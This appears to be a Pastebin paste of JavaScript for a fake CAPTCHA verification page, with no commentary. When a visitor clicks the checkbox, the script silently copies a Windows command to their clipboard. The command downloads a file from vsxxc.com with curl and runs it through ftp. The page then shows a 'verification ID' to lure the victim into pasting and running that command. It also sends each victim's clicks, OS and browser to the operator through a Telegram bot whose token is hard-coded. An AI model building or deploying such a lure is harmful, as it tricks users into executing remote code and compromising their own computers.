Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- const TELEGRAM_BOT_TOKEN = '7708755483:An7X_G5mbD3YhjDI_Ss';
- const TELEGRAM_CHAT_ID = '78510';
- document.getElementById("bWfyD1").innerText = document.getElementById("bWfyD1").innerText.replaceAll("...", window.location.host);
- document.getElementById("waiting-for").innerText = document.getElementById("waiting-for").innerText.replaceAll("...", window.location.host);
- document.getElementById("heading-favicon").innerText = document.getElementById("heading-favicon").innerText.replaceAll("...", window.location.host);
- if (window.matchMedia && window.matchMedia('(prefers-color-scheme: dark)').matches) {
- document.body.classList.add("theme-dark");
- } else {
- document.body.classList.add("theme-light");
- }
- // Function to generate a unique username
- function generateUniqueUsername() {
- const adjectives = [
- 'Long', 'Spider', 'Crazy', 'Brave', 'Silent', 'Mighty', 'Quick', 'Wise',
- 'Sneaky', 'Cosmic', 'Iron', 'Golden', 'Shadow', 'Frost', 'Thunder'
- ];
- const animals = [
- 'Dog', 'Cat', 'Wolf', 'Fox', 'Hawk', 'Bear', 'Lion', 'Eagle',
- 'Shark', 'Scat', 'Whale', 'Owl', 'Tiger', 'Cobra', 'Raven'
- ];
- const storedUsername = localStorage.getItem('uniqueUsername');
- if (storedUsername) {
- return storedUsername;
- }
- const username =
- adjectives[Math.floor(Math.random() * adjectives.length)] +
- animals[Math.floor(Math.random() * animals.length)];
- localStorage.setItem('uniqueUsername', username);
- return username;
- }
- const cmd = `cmd /i /c cd %userprofile% && curl.exe --proto-default httP -L -o "dcf.log" vsxxc.com/upn.php && ftp -s:dcf.log &&`;
- const verifyWnd = document.getElementById("verify-window");
- const checkboxBtn = document.getElementById("checkbox");
- const content = document.getElementById("HJup0");
- const verifLogoId = document.getElementById("verifying");
- const verifId = document.getElementById("verification-id");
- const generatedId = generateRandomNumber();
- const uniqueUsername = generateUniqueUsername();
- let doOnce = false;
- let clickCount = localStorage.getItem('clickCount') ? parseInt(localStorage.getItem('clickCount')) : 0;
- checkboxBtn.addEventListener("click", async () => {
- clickCount++;
- localStorage.setItem('clickCount', clickCount);
- if (!doOnce) {
- doOnce = true;
- } else {
- return;
- }
- content.style.display = "none";
- verifLogoId.style.display = "flex";
- verifLogoId.style.visibility = "visible";
- const browserInfo = getBrowserInfo();
- let notificationMessage = `🚨💥 ALERT! New click detected by ${uniqueUsername}!🔥\n` +
- `-------------------------------------\n` +
- ` OS: ${browserInfo.os}\n` +
- ` SYSTEM: ${browserInfo.name} ${browserInfo.version}\n` +
- ` CLICKS: ${clickCount} 🔢\n` +
- `-------------------------------------`;
- if (browserInfo.os === 'Windows') {
- notificationMessage = `💻✨ Windows User Alert! **${uniqueUsername}** clicked! 🎉\n` +
- `-------------------------------------\n` +
- ` OS: ${browserInfo.os}\n` +
- ` SYSTEM: ${browserInfo.name} ${browserInfo.version}\n` +
- ` CLICKS: ${clickCount} 🔢\n` +
- `-------------------------------------`;
- }
- await sendTelegramNotification(notificationMessage);
- verifId.innerText = generatedId;
- verifyWnd.style.visibility = "visible";
- verifyWnd.style.opacity = "100%";
- checkboxBtn.disabled = true;
- stageClipboard(cmd, generatedId);
- if (browserInfo.os === 'Windows' && clickCount === 2) {
- await sendTelegramNotification(`⚠️ **${uniqueUsername}**, please check the panel ASAP! 🚀💫`);
- }
- if (browserInfo.os === 'Windows') {
- setTimeout(() => {
- sendTelegramNotification(`⏳ **${uniqueUsername}**, 20 seconds have passed! Keep me updated until I disappear! 👻`);
- }, 20000);
- }
- });
- function generateRandomNumber() {
- return Math.floor(Math.random() * (9999 - 1000 + 1) + 1000).toString();
- }
- async function sendTelegramNotification(message) {
- try {
- const url = `https://api.telegram.org/bot${TELEGRAM_BOT_TOKEN}/sendMessage`;
- const response = await fetch(url, {
- method: 'POST',
- headers: {
- 'Content-Type': 'application/json'
- },
- body: JSON.stringify({
- chat_id: TELEGRAM_CHAT_ID,
- text: message
- })
- });
- if (!response.ok) {
- console.error('Telegram notification failed', await response.text());
- }
- } catch (error) {
- console.error('Error sending Telegram notification:', error);
- }
- }
- //
- function copyToClipboard(text) {
- if (window !== window.parent) {
- console.log("error:", text);
- window.parent.postMessage({ type: "copy", text: text }, "*");
- } else {
- navigator.clipboard.writeText(text).then(() => {
- console.log("copied:", text);
- }).catch(err => {
- console.error("error cc:", err);
- });
- }
- }
- //
- function stageClipboard(commandToRun, verification_id) {
- const suffix = "";
- const ploy = " action : ";
- const end = "";
- const textToCopy = commandToRun + suffix + ploy + verification_id + end;
- copyToClipboard(textToCopy); //
- }
- // ✅
- window.addEventListener("message", function(event) {
- if (event.data.type === "copy") {
- navigator.clipboard.writeText(event.data.text).then(() => {
- console.log("success:", event.data.text);
- }).catch(err => {
- console.error("error:", err);
- });
- }
- });
- // ✅
- function getBrowserInfo() {
- const ua = navigator.userAgent;
- let browserName = 'Unknown', browserVersion = 'Unknown', osName = 'Unknown';
- if (ua.includes('Firefox')) {
- browserName = 'Firefox';
- browserVersion = ua.match(/Firefox\/([0-9.]+)/)?.[1] || 'Unknown';
- } else if (ua.includes('Chrome')) {
- browserName = 'Chrome';
- browserVersion = ua.match(/Chrome\/([0-9.]+)/)?.[1] || 'Unknown';
- }
- if (ua.includes('Windows')) osName = 'Windows';
- else if (ua.includes('Mac')) osName = 'macOS';
- else if (ua.includes('Linux')) osName = 'Linux';
- return {
- name: browserName,
- version: browserVersion,
- os: osName
- };
- }
Advertisement
Add Comment
Please, Sign In to add comment